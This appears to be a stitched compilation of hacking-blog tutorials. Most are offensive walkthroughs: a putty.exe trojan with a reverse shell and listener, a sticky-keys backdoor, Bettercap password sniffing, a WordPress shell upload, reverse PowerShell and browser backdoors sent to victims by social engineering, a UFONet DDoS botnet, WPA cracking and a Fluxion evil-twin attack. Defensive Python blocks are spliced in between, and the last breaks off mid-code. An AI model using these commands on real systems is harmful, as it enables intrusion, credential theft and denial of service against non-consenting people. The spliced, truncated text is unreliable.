Channel: Hacking Tools Archives - Hacking Articles

How to identify Network Vulnerabilities using Nessus (Beginner Guide)


Every hacker or information security professional is incomplete without a vulnerability scanner, especially without the Nessus vulnerability scanner. Nessus is a very powerful tool and the world’s most popular vulnerability scanner; it is used by many companies and security professionals, and it is also free for personal use.

Nessus scans for the following vulnerabilities and offers these capabilities:

  • Vulnerabilities that allow remote access
  • Misconfiguration
  • Weak passwords
  • DoS (denial of service) attacks
  • Help in PCI DSS (Payment Card Industry Data Security Standard) audits
  • Mobile device audits
  • Customized reporting

Installing Nessus

Well, Nessus supports many different operating systems, including various versions of Windows and Linux, FreeBSD, Sun Solaris, etc.

So in this article, I’m using Windows for installing Nessus.

You can download Nessus from the official website.

Download and install Nessus. After that, Nessus will automatically open in your browser at https://localhost:8834; if not, open your browser and type this address to set up Nessus. Click Continue.

Create an account with administrator rights. From this administrative account you can also create more user accounts.

Now select your registration type and enter the activation code, which you will receive in your email account when you register and download Nessus from the official website.

Then click Continue.

After that Nessus will start downloading the components required to perform a scan. It will take a few minutes to complete if you have a good internet connection.

After downloading and installation, you will see the Nessus web interface, where you will perform different types of scans.

To perform a scan, click on New Scan.

Now there are many preset scanning templates for different types of environments.

Well, these are policies; on the basis of a policy, we scan a network, cloud infrastructure, web application and much more.

You can also create your own customized policy to perform a scan according to your own requirements.

To create a customized policy, click on Policy, then click on New Policy. After that a settings menu will appear, where you have to set what you want to scan, ports, etc. Some policies require credentials to perform a scan, so you have to provide credentials as well.

For example, here I created a policy for a PCI DSS scan.

In this way you can create a customized policy.

So now, to perform a scan, click on Scans and then New Scan. After that select a preset template, or you can also select your customized policy to perform a scan. Here I’m selecting Advanced Scan.

Now give a name to this scan; if you want to write some notes related to this vulnerability scan, type them in the Description section, and then type the IP address of the target to perform vulnerability scanning. You can also give a range of IP addresses. Here we are performing a network vulnerability scan.

Finally, LAUNCH your scan.

After a few minutes, Nessus will tell you about the vulnerabilities in your network. As you can see here, Nessus found many vulnerabilities on one of my servers in the network.

Basically Nessus uses the standard CVSS (Common Vulnerability Scoring System) base score for vulnerability scoring.

Here you can see Nessus found the UnrealIRCd Backdoor vulnerability and marked it as CRITICAL with a CVSS score of 10.0. Exploits for this vulnerability are also available online.

Nessus also found the Samba Badlock vulnerability and marked it as MEDIUM with a CVSS score of 6.8. Even for this vulnerability, exploits are available online.

In the Remediation section, Nessus will tell you a few countermeasures to protect your network and fix the vulnerabilities.
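To act on findings like the two above across many hosts, it helps to triage a Nessus export instead of reading the web UI host by host. The script below is an added example, not part of the original article and not Nessus’ own code: it parses a small constructed .nessus (v2 XML) report, drops informational plugins, and ranks the rest by CVSS base score, bumping findings that Nessus flags as having a public exploit. The plugin IDs, host and solution strings are constructed placeholders.

```python
"""Triage a Nessus (.nessus v2 XML) export: rank findings by CVSS and exploit availability.

Added defensive example; not Nessus' own code. The sample report below is constructed.
"""
from __future__ import annotations

import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample export modelled on the .nessus v2 layout (plugin IDs are placeholders, not real ones).
SAMPLE_NESSUS = """<NessusClientData_v2>
  <Report name="lab-scan">
    <ReportHost name="192.168.1.20">
      <ReportItem port="6667" svc_name="irc" protocol="tcp" severity="4"
                  pluginID="10001" pluginName="UnrealIRCd Backdoor Detection">
        <risk_factor>Critical</risk_factor>
        <cvss_base_score>10.0</cvss_base_score>
        <exploit_available>true</exploit_available>
        <solution>Reinstall the IRC daemon from a verified source.</solution>
      </ReportItem>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="2"
                  pluginID="10002" pluginName="Samba Badlock Vulnerability">
        <risk_factor>Medium</risk_factor>
        <cvss_base_score>6.8</cvss_base_score>
        <exploit_available>true</exploit_available>
        <solution>Upgrade Samba to a fixed release.</solution>
      </ReportItem>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                  pluginID="10003" pluginName="SSH Server Type and Version">
        <risk_factor>None</risk_factor>
        <exploit_available>false</exploit_available>
      </ReportItem>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""


@dataclass
class Finding:
    host: str
    port: str
    protocol: str
    plugin_id: str
    name: str
    severity: int          # Nessus severity: 0 info, 1 low, 2 medium, 3 high, 4 critical
    cvss: float
    exploit_available: bool
    solution: str

    def priority(self) -> float:
        """Ranking score: CVSS base score, plus a fixed bump when a public exploit exists."""
        return self.cvss + (2.0 if self.exploit_available else 0.0)


def parse_nessus(xml_text: str) -> list[Finding]:
    """Walk every ReportHost/ReportItem and pull the attributes and child elements we triage on."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("ReportHost"):
        for item in host.findall("ReportItem"):
            findings.append(Finding(
                host=host.get("name", ""),
                port=item.get("port", "0"),
                protocol=item.get("protocol", ""),
                plugin_id=item.get("pluginID", ""),
                name=item.get("pluginName", ""),
                severity=int(item.get("severity", "0")),
                cvss=float(item.findtext("cvss_base_score", default="0") or 0),
                exploit_available=item.findtext("exploit_available", default="false").strip().lower() == "true",
                solution=item.findtext("solution", default="").strip(),
            ))
    return findings


def triage(findings: list[Finding], min_severity: int = 1) -> list[Finding]:
    """Drop informational plugins and sort the rest by descending priority, then host and port."""
    actionable = [f for f in findings if f.severity >= min_severity]
    return sorted(actionable, key=lambda f: (-f.priority(), f.host, int(f.port)))


def remediation_report(xml_text: str) -> list[str]:
    """One line per actionable finding, most urgent first, with the Nessus remediation text."""
    lines = []
    for f in triage(parse_nessus(xml_text)):
        flag = "EXPLOIT AVAILABLE" if f.exploit_available else "no public exploit"
        lines.append(f"{f.host}:{f.port}/{f.protocol} CVSS {f.cvss:.1f} [{flag}] {f.name} "
                     f"-> {f.solution or 'see plugin output'}")
    return lines


if __name__ == "__main__":
    for line in remediation_report(SAMPLE_NESSUS):
        print(line)
```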

Author: Akshay Bhardwaj is a passionate Ethical Hacker | Information Security Researcher | Technical writer. You can follow him on LinkedIn and Facebook.

The post How to identify Network Vulnerabilities using Nessus (Beginner Guide) appeared first on Hacking Articles.


Find Your Website History using Waybackpack


Waybackpack is a command-line tool that lets you download the entire Wayback Machine archive for a given URL.

Open your Kali Linux terminal, go to the desktop and type the following command:

git clone https://github.com/jsvine/waybackpack.git

Now go to the waybackpack folder and type the following command:

pip install waybackpack

Now run the following command to fetch any website for a particular year and save the result in .html format in the desired folder.

In the example below I’m using hackingarticles.in for the year 2010 and saving the result in /Downloads/hacking-wayback.

Now you will see the saved file in the desired folder.

See the result below.


Detect Vulnerability Scanner in Network using Kfsensor


In the previous article, we saw how KFSensor Honeypot IDS detects an unauthorized person by simulating vulnerable system services. Well, to a hacker a vulnerability is like a jewel. For every hacker or malicious person the first phase of hacking is footprinting and the second is scanning, where they find out whether a system is vulnerable to an attack or not. So in this article, we will detect an unauthorized person or a hacker and stop them.

Install and start the KFSensor Honeypot IDS server; to do this, read my previous article:

http://www.hackingarticles.in/detect-hacker-network-using-kfsensor-honeypot

Here my KFSensor Honeypot is ready.

The scanning phase tells us whether a system is vulnerable or not and sometimes even provides information about the exploits available for that vulnerability. So every hacker performs this step before exploiting your system.

So here I try to scan my system running KFSensor with the Nessus vulnerability scanner from another computer.

As you can see, Nessus started scanning my system and looking for vulnerabilities.

Here you can see that KFSensor Honeypot IDS alerted you that someone is trying to scan your system for vulnerabilities, that some of the packets your system is receiving are malicious, and it recorded the attacker’s IP address.

Now I’m also trying to scan my system with GFI LanGuard to see whether KFSensor IDS detects it or not.

GFI LanGuard started scanning.

Here KFSensor Honeypot IDS alerted that someone is sending packets to find vulnerabilities in the system. Here you can monitor attacks on every TCP and UDP port. You can even see ICMP or ping messages.

Here you can see that someone is trying to attack a port, and their IP address is 192.168.149.1.

You can also view alerts by visitor, meaning which IP address is trying to access which ports.

KFSensor Honeypot IDS can also detect whether someone is using a vulnerability scanner to attack your system. Now we know that a particular IP address is sending too many packets, which is not good. So to block that IP address we have to create a separate policy for that visitor.

To do that, double-click on the IP address you want to block from accessing your system; a menu will appear.

Now click on Details.

Here click on Create Visitor Rule to create a policy.

After that select the port you want to block for that IP address and select the action: Close or Ignore all requests from that particular IP address.
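The signal the honeypot reacts to above is one visitor touching many ports in a short time. The script below is an added example, not part of the original article and not KFSensor’s code or log format: it applies that same rule to a constructed connection log (a simple "date time proto src -> dst:port" layout assumed here), flags any source that hits five or more distinct services within a minute, and drafts the per-visitor port/action rule you would otherwise create by hand.

```python
"""Detect port-scanning visitors in honeypot connection logs and draft a per-visitor block rule.

Added defensive example; not KFSensor's own code. The log layout and IPs are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log in an assumed "date time proto src -> dst:port" layout (not KFSensor's format).
SAMPLE_LOG = """\
2017-03-01 10:15:01 TCP 192.168.149.1 -> 192.168.149.20:21
2017-03-01 10:15:01 TCP 192.168.149.1 -> 192.168.149.20:22
2017-03-01 10:15:02 TCP 192.168.149.1 -> 192.168.149.20:23
2017-03-01 10:15:02 TCP 192.168.149.1 -> 192.168.149.20:80
2017-03-01 10:15:03 UDP 192.168.149.1 -> 192.168.149.20:161
2017-03-01 10:15:03 TCP 192.168.149.1 -> 192.168.149.20:443
2017-03-01 10:15:04 TCP 192.168.149.1 -> 192.168.149.20:3389
2017-03-01 10:15:04 TCP 192.168.149.1 -> 192.168.149.20:8080
2017-03-01 10:15:05 ICMP 192.168.149.1 -> 192.168.149.20:0
2017-03-01 10:16:10 TCP 192.168.149.7 -> 192.168.149.20:80
2017-03-01 10:17:30 TCP 192.168.149.7 -> 192.168.149.20:80
"""

WINDOW = timedelta(seconds=60)   # look-back window for counting distinct services
THRESHOLD = 5                    # distinct proto/port pairs inside the window that mean "scanner"


def parse_line(line):
    """Return (timestamp, proto, src_ip, dst_ip, dst_port) for one log line."""
    date, time, proto, src, _arrow, dst = line.split()
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S"), proto, src, dst_ip, int(dst_port)


def detect_scanners(log_text, window=WINDOW, threshold=THRESHOLD):
    """Map each source IP that touched >= threshold distinct services within `window` to an alert."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            ts, proto, src, _dst_ip, port = parse_line(line)
            events[src].append((ts, proto, port))

    alerts = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end, (ts, _proto, _port) in enumerate(evs):
            # Slide the window so that evs[start:end+1] all lie within `window` of the newest event.
            while ts - evs[start][0] > window:
                start += 1
            touched = {(p, q) for _t, p, q in evs[start:end + 1]}
            if len(touched) >= threshold:
                alerts[src] = {
                    "first_seen": evs[0][0],
                    "last_seen": evs[-1][0],
                    "services": sorted({(p, q) for _t, p, q in evs}),
                }
                break
    return alerts


def visitor_rule(src, alert, action="Ignore"):
    """Draft a per-visitor rule (one line per touched service) like the one KFSensor lets you create by hand."""
    return [f"{src} {proto}/{port} -> {action}" for proto, port in alert["services"]]


if __name__ == "__main__":
    for src, alert in detect_scanners(SAMPLE_LOG).items():
        print(f"SCANNER {src}: {len(alert['services'])} services between "
              f"{alert['first_seen']} and {alert['last_seen']}")
        for rule in visitor_rule(src, alert):
            print("  ", rule)
```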

Author: Akshay Bhardwaj is a passionate Hacker, Information Security Researcher | Technical writer. You can follow him on LinkedIn and Facebook.


Hack Remote Windows 10 PC using Cypher (Adding Shellcode to PE files)


First clone the cypher repository from GitHub; to do so type:

git clone https://github.com/xan7r/cypher.git

Now choose an executable file and copy it to the cypher folder to bind cypher with that .exe file.

Here in my case I have copied putty.exe as the file to bind with cypher.

Note: only executable files can be bound.

Now run the following command:

python addShell.py -f ./putty.exe -H 192.168.0.105 -P 4444 -p 0

The -p option specifies the payload. Default shell_reverse_tcp. Valid values are:

  • 0 – windows/shell_reverse_tcp
  • 1 – windows/meterpreter/reverse_http
  • 2 – windows/meterpreter/reverse_http +PrependMigrate
  • 3 – windows/meterpreter/reverse_https
  • 4 – windows/meterpreter/reverse_https +PrependMigrate

Now we need to set up a listener to handle the reverse connection sent by the victim when the exploit executes successfully. Start Metasploit using msfconsole:

use exploit/multi/handler

set payload windows/shell_reverse_tcp

set lhost 192.168.0.105

set lport 4444

exploit

Now send the bound putty_evil.exe to the victim; as soon as they open the file a shell session will open.


Access Sticky keys Backdoor on Remote PC with Sticky Keys Hunter


This bash script tests for sticky keys and utilman backdoors. The script will connect to an RDP server, send both the sticky keys and utilman triggers and screenshot the result.

How does it work?

  • Connects to RDP using rdesktop
  • Sends shift 5 times using xdotool to trigger sethc.exe backdoors
  • Sends Windows+U using xdotool to trigger utilman.exe backdoors
  • Takes a screenshot
  • Kills the RDP connection

First hack the victim PC using Metasploit (Tutorial: How to Hack Remote PC)

Bypass the UAC protection of the victim PC (Tutorial: How to Bypass UAC Protection)

After getting the session, enable the remote desktop option on the remote PC using the following module:

msf > use post/windows/manage/enable_rdp

msf post(enable_rdp) > set session 2

msf post(enable_rdp) > exploit

In the next step replace the sticky keys binary with the command prompt using the following module:

msf > use post/windows/manage/sticky_keys

msf post(sticky_keys) > set session 2

msf post(sticky_keys) > exploit

Now clone the Sticky Keys Hunter repository from GitHub; to do so type:

git clone https://github.com/ztgrace/sticky_keys_hunter.git

To scan a single host: ./stickyKeysHunter.sh 192.168.0.120

Now a pop-up will open like below.

Now press the shift key 5 times at the login screen and a command prompt will open up.

Now you can do anything on the victim PC through the command prompt. I am using the net user command to see the list of active accounts.


Hack Gmail and Facebook Password in Network using Bettercap


Note: In my case this trick works only for Internet Explorer users.

Bettercap is a complete, modular, portable and easily extensible MITM tool and framework with every kind of diagnostic and offensive feature you could need in order to perform a man-in-the-middle attack.

Go to the Kali Linux terminal and type:

git clone https://github.com/evilsocket/bettercap.git

It will clone bettercap from GitHub and store it in your root directory.

After that change into the cloned directory. Now it’s time to install bettercap and its dependencies; it uses Ruby gems to install all its required dependencies.

To install, type:

gem build bettercap.gemspec

Now type:

sudo gem install bettercap*.gem

It will install bettercap and all its dependencies using gem.

Now that we have installed Bettercap, start the sniffer to sniff the network.

Type in the terminal:

bettercap --proxy -P post

Here you can see the hacked Facebook account and the victim’s username and password.

See the example below:


Penetration Testing in WordPress Website using WordPress Exploit Framework


A Ruby framework for developing and using modules which aid in the penetration testing of WordPress-powered websites and systems.

First clone the WPXF repository from GitHub; to do so type:

git clone https://github.com/rastating/wordpress-exploit-framework.git

Now open a Kali Linux terminal in the directory that you have downloaded WordPress Exploit Framework to, and start it by running ruby wpxf.rb.

Once loaded, you’ll be presented with the wpxf prompt; from here you can search for modules using the search command or load a module using the use command.

wpxf > use exploit/reflex_gallery_shell_upload

wpxf [exploit/reflex_gallery_shell_upload] > set host 192.168.0.104

wpxf [exploit/reflex_gallery_shell_upload] > set target_uri /

wpxf [exploit/reflex_gallery_shell_upload] > set payload reverse_tcp

wpxf [exploit/reflex_gallery_shell_upload] > set lhost 192.168.0.105

wpxf [exploit/reflex_gallery_shell_upload] > run


Hack Remote PC with Reverse PowerShell using Brosec


Brosec is a terminal-based reference utility designed to help us infosec bros and broettes with useful (yet sometimes complex) payloads and commands that are often used during work as infosec practitioners. An example of one of Brosec’s most popular use cases is the ability to generate on-the-fly reverse shells (python, perl, powershell, etc.) that get copied to the clipboard.

First install the Brosec tool in your Kali Linux. Follow the steps below one by one:

Reference:

https://github.com/gabemarshall/Brosec

  • apt-get install npm build-essential g++ xsel netcat – Install dependencies
  • npm config set registry http://registry.npmjs.org/ – The npm registry seems to be broken by default when installed from the Kali repos
  • npm install -g n – Install n (nodejs version manager)
  • n latest – Install the latest version of nodejs
  • git clone https://github.com/gabemarshall/Brosec.git – Clone the Brosec repo
  • cd Brosec && npm install – cd into the directory and install npm dependencies

After that start Brosec by typing in the terminal:

./bros

It will show you the menu options.

Now set the IP of your local host:

set lhost 192.168.0.111

Now set the lport:

set lport 4444

After setting the lhost and lport, choose option 5 Miscellaneous.

You will see 2 options, Reverse Shells and Exfiltration. Now select option 1 Reverse Shells; see the image below:

After choosing the option Reverse Shells, you will see 5 options. In my case I’m selecting option 4 Reverse Shell PSH.

Now it will show you the message: Should I start a netcat listener for you?

Press Y to start the netcat listener. It will generate a PowerShell script; see the picture below.

Copy this code into a text editor and save it with the .ps1 (PowerShell) extension.

Now send the saved .ps1 file to the victim using any social engineering method. When the victim clicks on it, you will get a session on the victim’s PC. See the picture below for reference.

Now you can use the systeminfo command to get information about the victim’s PC.



Hack Remote PC using BrowserBackdoor – JavaScript WebSocket Backdoor


BrowserBackdoor is an Electron application that uses a JavaScript WebSocket backdoor to connect to the listener.

BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.

The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets.

First clone the BrowserBackdoor repository from GitHub; to do so type:

git clone https://github.com/IMcPwn/browser-backdoor.git

Follow the steps below one by one:

cd client

npm install

Now, in the client folder, open the index.html file in leafpad and edit the following line to enter your Kali Linux IP; a screenshot is given below.

After finishing the above task it will create the Browser backdoor script folder for Windows and Linux users.

Now type the following commands step by step:

npm install electron-packager -g

electron-packager . --all

Now go to the server folder in the browser-backdoor directory and run the following command:

bundle install

After that start browser backdoor by typing in the terminal:

ruby bbsconsole.rb

Now send the BrowserBackdoor-win32-x64 build to the victim using any social engineering method; when the victim clicks on the BrowserBackdoor file you get the victim’s session. An example is given below.

Now type the session command to check the active sessions; it will show you the session with its ID number.

Type the target command with the session ID to interact with the current session; see the following example:

target 0

Now if you want more options, type the help command to get the list of all available commands.


Automating Exploitation of Remote PC using Metasploithelper


Metasploit contains port-based modules as well as URI-based modules (web servers). This tool bridges an Nmap XML file with Metasploit and generates a resource script containing the matching Metasploit modules that you can run against the target servers.

First clone the metasploitHelper repository from GitHub; to do so type:

git clone https://github.com/milo2012/metasploitHelper.git

Now open the terminal, scan the target with nmap and store the results in an XML file.

Here the target is 192.168.0.126 and the results are stored in the 126.xml file.

nmap -sV -oX 126.xml 192.168.0.126

Now enter the metasploitHelper folder and open metasploitHelper.py with leafpad.

Now change the path in the above file to “/usr/share/metasploit-framework/modules/”.

Now run metasploitHelper, giving the nmap output stored above as input:

python metasploitHelper.py -i 126.xml

The above command will generate two rc scripts, namely runAux.rc and runExp.rc.

runAux.rc contains the auxiliary modules and runExp.rc contains all the exploit modules.

Now give those scripts as input to msfconsole. First we will give runAux.rc, to use the auxiliary modules, with the command:

msfconsole -r runAux.rc

Now, if an auxiliary module is successful it will show us the result; in my case it found the VNC login password of the target machine.

Now we will run the runExp.rc script to run all the exploits found by metasploitHelper:

msfconsole -r runExp.rc

Now if there is an exploitable vulnerability in the target machine it will exploit it and give a shell or meterpreter depending upon the exploit; in my case, it exploited the vsftpd vulnerability to get a reverse shell. Now we can run any command depending on the OS.

Author: Himanshu Gupta is an Information Security Researcher | Technical writer. You can follow him on LinkedIn.


How to Create Botnet for D-Dos Attack with UFONet


Remember: this tool is NOT for educational purposes.

Usage of UFONet for attacking targets without prior mutual consent is illegal.

It is the end user’s responsibility to obey all applicable local, state and federal laws.

UFONet is a free software tool designed to test DDoS attacks against a target using ‘Open Redirect’ vectors on third-party web applications, which together act like a botnet.

Features

  • Auto-update
  • Clean code (only needs python-pycurl)
  • Documentation with examples
  • Web/GUI Interface
  • Proxy to connect to ‘zombies’ (ex: tor)
  • Change HTTP Headers (User-Agent, Referer, Host…)
  • Configure requests (Timeout, Retries, Delay…)
  • Search for ‘zombies’ on google results (using a pattern or a list of dorks)
  • Test ‘Open Redirect’ vulnerabilities on ‘zombies’
  • Download/Upload ‘zombies’ from Community
  • Inspect a target (HTML objects sizes)
  • Set a place to ‘bit’ on a target (ex: big file)
  • Control number of rounds to attack
  • Apply cache evasion techniques
  • Supports GET/POST
  • Multithreading
  • Different search engines for dorking
  • Web interface
  • Geomapping / Visual data
  • Order ‘zombies’ to attack you for benchmarking
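A third-party site only becomes a ‘zombie’ if it carries an open redirect, so the defensive fix belongs to that site’s redirect handler. The block below is an added example, not part of the original article and not UFONet’s code: it puts the flawed pattern (trusting a next= parameter as-is) beside a hardened check that accepts only same-site paths or allowlisted hosts, and runs both over constructed probe URLs covering the usual bypasses (protocol-relative, backslash, userinfo and look-alike hosts). ALLOWED_HOSTS and the probe URLs are constructed.

```python
"""Open-redirect validation: the flaw that turns a third-party site into a DDoS 'zombie', beside a hardened check.

Added defensive example; not UFONet's code. The allowlist and probe URLs are constructed.
"""
from urllib.parse import urlparse

ALLOWED_HOSTS = {"www.example.com", "example.com"}  # constructed allowlist of our own hostnames


def vulnerable_redirect_target(next_url: str) -> str:
    """Flawed pattern kept for contrast: the ?next= value is used unchanged, so a request such as
    /login?next=https://victim.test/big.iso sends every visitor (or bot hitting that URL) to the victim."""
    return next_url


def safe_redirect_target(next_url: str, fallback: str = "/") -> str:
    """Return next_url only if it is a same-site path or an absolute URL to an allowlisted host."""
    if not next_url or len(next_url) > 2048 or not next_url.isprintable():
        return fallback
    # Browsers treat backslashes as slashes in URLs, so "/\evil.test" would behave like "//evil.test".
    candidate = next_url.replace("\\", "/")
    parsed = urlparse(candidate)
    if parsed.scheme == "" and parsed.netloc == "":
        # Relative target: allow a single leading slash only ("//host" is protocol-relative, not local).
        return candidate if candidate.startswith("/") and not candidate.startswith("//") else fallback
    if parsed.scheme not in ("http", "https"):
        return fallback
    # .hostname strips userinfo ("www.example.com@evil.test") and the port, so we compare the real host.
    host = (parsed.hostname or "").lower()
    return candidate if host in ALLOWED_HOSTS else fallback


# Constructed probe URLs, each paired with the outcome a hardened handler should produce.
PROBES = [
    ("/account/settings", "/account/settings"),
    ("https://www.example.com/dashboard", "https://www.example.com/dashboard"),
    ("https://victim.test/big.iso", "/"),
    ("//victim.test/big.iso", "/"),
    ("/\\victim.test/big.iso", "/"),
    ("https://www.example.com@victim.test/", "/"),
    ("https://www.example.com.victim.test/", "/"),
    ("javascript:alert(1)", "/"),
]


def audit_probes(probes=PROBES):
    """Check the hardened handler against every probe and return the probes the flawed handler would leak."""
    leaks = []
    for url, expected in probes:
        got = safe_redirect_target(url)
        if got != expected:
            raise AssertionError(f"hardened handler returned {got!r} for {url!r}, expected {expected!r}")
        if vulnerable_redirect_target(url) != got:
            leaks.append(url)
    return leaks


if __name__ == "__main__":
    for url in audit_probes():
        print("flawed handler would redirect off-site:", url)
```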

First of all download UFONet from SourceForge via this link:

https://sourceforge.net/projects/ufonet/

Extract it, enter the folder, open up the terminal and list all the options available with this command: ./ufonet --help

Now we have to download all the zombies that will be used for the attack. Open the terminal and type:

./ufonet --download-zombies

Now type the following command to use the GUI version:

./ufonet --gui

The above command will open a browser with GUI options. Click on START MOTHERSHIP.

Now it will open up a GUI with different options.

Now click on the Botnet option.

Clicking on Botnet will give many options to configure.

Now clicking on List Zombies will list all the zombies it will be using for the attack.

Now click on the Attack option.

Set the target to your target URL or target IP, set the number of rounds as per your need and click on start to begin the attack.

As you can see, the first round of the attack is started from multiple zombies, and after a while the host will be down.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.


Hack Wireless Network using Airgeddon


Airgeddon is a multi-use bash script for Linux systems to audit wireless networks.

Features

  • Interface mode switcher (Monitor-Managed).
  • DoS over wireless networks with different methods.
  • Assisted Handshake file capture.
  • Cleaning and optimizing Handshake captured files.
  • Offline password decrypt on WPA/WPA2 captured files (dictionary and bruteforce).
  • Compatibility with many Linux distros (see requirements section).
  • Easy targeting and selection in every section.
  • Controlled Exit. Cleaning tasks and temp files. Option to keep monitor mode if desired.
  • Multilanguage support and autodetect OS language feature (see supported languages section).
  • Help hints in every zone/menu for easy use.
  • Auto-update. Script checks for newer version if possible.

First of all clone airgeddon from git by executing the following command in the terminal:

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Now to launch airgeddon, enter the cloned folder and execute the command:

./airgeddon.sh

After execution it will take some time to check whether all the tools are installed; then press Enter when asked.

Now it will ask you to select an interface. Select wlan0 for Wi-Fi attacks; in my case I have selected 2.

After selecting wlan0 it will give many other options to choose from. You have to select option 2 to enter monitor mode, which puts the wlan0 interface in monitor mode to listen to all the available Wi-Fi connections, and then press the ENTER key to continue.

Now again it will give some new options; you have to select option 5 to enter the Handshake tools menu.

Now it will present you with more options; select option 5 to start capturing the handshake and press ENTER when asked. Then it will again ask you to press ENTER to select the target, so press ENTER.

Now it will open a new window showing you the list of available targets. Wait till your target Wi-Fi appears and then hit Ctrl+C.

Now it will show you the available target list, so select your target by entering the ID number given in the N column. I have selected the network Tenda_3 by entering 6. After that press ENTER to continue.

Now it will ask you to choose the attack type, so select 2 for the Deauth aireplay attack, which will first use a deauth attack to disconnect all the clients and then capture the handshake between the router and the client. Again press ENTER to continue, which will open two windows.

As you can see below, two windows will open: one is the deauth attack window and the other is capturing the handshake. You have to wait till the WPA Handshake appears on the top right side of the window and then hit Ctrl+C.

Then it will ask if you got the handshake, so press y for YES; then it will ask for the path of the capture file, which is set by default to the last capture, so just press ENTER.

Now you have to return to the main menu by pressing 7.

Now you have to crack the password by selecting option 6.

Now it will ask you to select an attack for breaking the password; we will select the dictionary attack to use a dictionary. Then it will ask if you want to use the already selected BSSID, so press y; it will again ask whether to use the already selected BSSID, so press y; and then it will ask for the path of the dictionary file. Here you can give your custom-made dictionary or a default dictionary present in Kali. I have used passwords.lst from /usr/share/nmap/nselib/data/passwords.lst and then pressed the ENTER key to continue.

Now it will start cracking with aircrack-ng, and if the password is present in the dictionary it will show you the password, as you can see: KEY FOUND [87654321].


Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack)


Fluxion is a remake of linset by vk439 with fewer bugs and more features. It’s compatible with the latest release of Kali (Rolling).

How it works

  • Scan the networks.
  • Capture a handshake (can’t be used without a valid handshake; it’s necessary to verify the password).
  • Use the WEB Interface *
  • Launch a Fake AP instance to imitate the original access point.
  • Spawns an MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the Fake AP and enter the WPA password.
  • A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script.
  • A captive portal is launched in order to serve a page which prompts the user to enter their WPA password.
  • Each submitted password is verified against the handshake captured earlier.
  • The attack will automatically terminate as soon as a correct password is submitted.

First of all clone Fluxion from GitHub with the command:

git clone https://github.com/deltaxflux/fluxion.git

And execute the script from its folder with the command:

./fluxion

After starting, it will ask you to choose the interface, so select wlan0 by entering 1; then it will ask you to select the channel to listen to Wi-Fi connections on, so enter 1 to listen to all Wi-Fi connections.

It will open a new window for Wi-Fi monitoring, so wait till your target appears and hit Ctrl+C.

Now it will show the list of available targets, so select the target by entering the ID number of that connection; in my case I have selected ttpl by pressing 2.

Now select option 1 for creating the fake AP (access point) and press ENTER.

Now press ENTER to skip, and then select 1 to choose aircrack-ng from the handshake checking options.

Now select option 1 to deauthenticate all clients connected to the target Wi-Fi.

After selecting 1 it will open 2 windows, one for capturing the WPA handshake and the other for deauthenticating all clients. Now enter 1 in the MENU window to check the handshake without closing the other windows.

After checking the handshake it will ask you to choose the Web Interface, so select 1 and press ENTER.

Now it will ask you to choose the language, so select 1 for ENGLISH and press ENTER.

Now it will open 4 windows, starting the fake AP and deauthenticating the clients of the Wi-Fi network.

Now the fake AP is started; the clients will not be able to connect to the original Wi-Fi and will be forced to connect to our fake AP, and when a client opens a browser it will be redirected to a login page asking for the WPA password.

When the user enters the correct WPA password all the attacks will be stopped and the password will be shown; in my case KEY FOUND [rajchandel12345]. (ATTACKS WILL ONLY STOP WHEN THE CLIENT ENTERS THE CORRECT PASSWORD)
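Both the airgeddon walkthrough above (deauth with aireplay to force a handshake) and Fluxion (MDK3 deauth plus an open fake AP carrying the real network name) leave two signatures a wireless monitor can pick up: a burst of deauthentication frames from one BSSID, and a second BSSID advertising your ESSID. The block below is an added example, not part of the original articles and not airgeddon’s or Fluxion’s code: it checks a constructed AP survey (modelled on the BSSID/CH/ENC/PWR/ESSID columns airodump-ng shows) against an assumed inventory of your own BSSIDs, and runs a sliding window over constructed management-frame summaries to flag a deauth flood.

```python
"""Wireless-side detection of the two things these attacks rely on: a deauthentication flood and an evil-twin AP.

Added defensive example; not airgeddon's or Fluxion's code. The AP survey, inventory and frames are constructed.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class AccessPoint:
    bssid: str
    essid: str
    channel: int
    privacy: str   # "OPN", "WEP", "WPA", "WPA2"
    power: int     # received signal strength in dBm


# Assumption: the defender keeps an inventory of the BSSIDs that legitimately serve each ESSID.
KNOWN_BSSIDS = {"AA:BB:CC:00:00:01": "ttpl"}

# Constructed survey snapshot, modelled on the columns airodump-ng shows (BSSID, CH, ENC, PWR, ESSID).
SURVEY = [
    AccessPoint("AA:BB:CC:00:00:01", "ttpl", 6, "WPA2", -48),
    AccessPoint("DE:AD:BE:EF:00:01", "ttpl", 6, "OPN", -33),       # same name, open, louder: the twin
    AccessPoint("11:22:33:44:55:66", "Tenda_3", 11, "WPA2", -70),  # someone else's network
]

# Constructed management-frame summaries: (timestamp_s, subtype, source_bssid, destination).
# 40 broadcast deauths in about 1.2 s spoofed from our own BSSID, some ordinary beacons, one stray deauth.
FRAMES = [(100.0 + i * 0.03, "deauth", "AA:BB:CC:00:00:01", "FF:FF:FF:FF:FF:FF") for i in range(40)]
FRAMES += [(100.0 + i * 0.1, "beacon", "AA:BB:CC:00:00:01", "FF:FF:FF:FF:FF:FF") for i in range(12)]
FRAMES += [(101.5, "deauth", "11:22:33:44:55:66", "66:55:44:33:22:11")]


def find_evil_twins(survey, known_bssids=KNOWN_BSSIDS):
    """Return (ap, reasons) for every AP that advertises one of our ESSIDs from a BSSID we do not own."""
    our_essids = set(known_bssids.values())
    legit_power = {ap.essid: ap.power for ap in survey if ap.bssid in known_bssids}
    alerts = []
    for ap in survey:
        if ap.essid not in our_essids or ap.bssid in known_bssids:
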